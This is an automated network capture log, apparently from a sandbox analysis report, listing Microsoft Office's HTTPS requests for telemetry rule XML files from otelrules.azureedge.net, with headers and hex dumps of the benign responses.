                                                                                                        Date: Mon, 09 Dec 2024 12:50:08 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 2284
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                        x-ms-request-id: ef8e0549-001e-0066-1d03-48561e000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125008Z-r1cf579d7789trgthC1EWRkkfc00000008yg000000009suh
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:08 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        87192.168.2.84981213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:09 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:09 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:09 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1393
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                        x-ms-request-id: a85144f8-201e-0033-7f03-48b167000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125009Z-r1cf579d778x776bhC1EWRdk8000000008b00000000072s5
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:09 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        88192.168.2.84981313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:09 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:09 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:09 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1356
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                        x-ms-request-id: 2ee9d743-c01e-0049-2337-49ac27000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125009Z-r1cf579d778x776bhC1EWRdk8000000008bg000000006ar9
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:09 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        89192.168.2.84981413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:10 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:10 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:10 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1393
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                        x-ms-request-id: 3fcff9c6-e01e-0052-0a03-48d9df000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125010Z-r1cf579d7788pwqzhC1EWRrpd800000008m0000000006tfn
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:10 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        90192.168.2.84981513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:10 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:10 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:10 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1356
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                        x-ms-request-id: 09d70899-501e-008c-3f6d-49cd39000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125010Z-r1cf579d778gg9hlhC1EWRh7nw00000000zg0000000052cm
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:10 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        91192.168.2.84981713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:11 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:11 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:11 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1395
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                        x-ms-request-id: 44286e75-701e-0032-5705-48a540000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125011Z-r1cf579d778469knhC1EWR2gqc0000000120000000007x7w
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        92192.168.2.84981613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:11 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:11 UTC515INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:11 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1358
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                        x-ms-request-id: d116e189-201e-006e-1038-49bbe3000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125011Z-r1cf579d778w7n65hC1EWR9b6800000000yg000000000tx8
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:11 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        93192.168.2.84981813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:12 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:12 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:12 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1395
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                        x-ms-request-id: 1ccbfaf0-201e-0003-3306-48f85a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125012Z-r1cf579d7788pwqzhC1EWRrpd800000008k0000000007fc7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:12 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        94192.168.2.84981913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:12 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:12 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:12 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1358
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                        x-ms-request-id: 8eb9891a-501e-005b-7103-48d7f7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125012Z-r1cf579d778z4wflhC1EWRa3h000000008hg000000000pzt
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:12 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        95192.168.2.84982013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:13 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:14 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:13 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1389
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                        x-ms-request-id: 51bfefb4-e01e-001f-6915-491633000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125013Z-r1cf579d778bb9vvhC1EWRs95400000007yg000000006a98
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:14 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        96192.168.2.84982113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:13 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:14 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:13 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1352
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                        x-ms-request-id: 1ec3a3fb-701e-0001-7303-48b110000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125013Z-r1cf579d7786c2tshC1EWRr1gc00000007z0000000007b4r
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
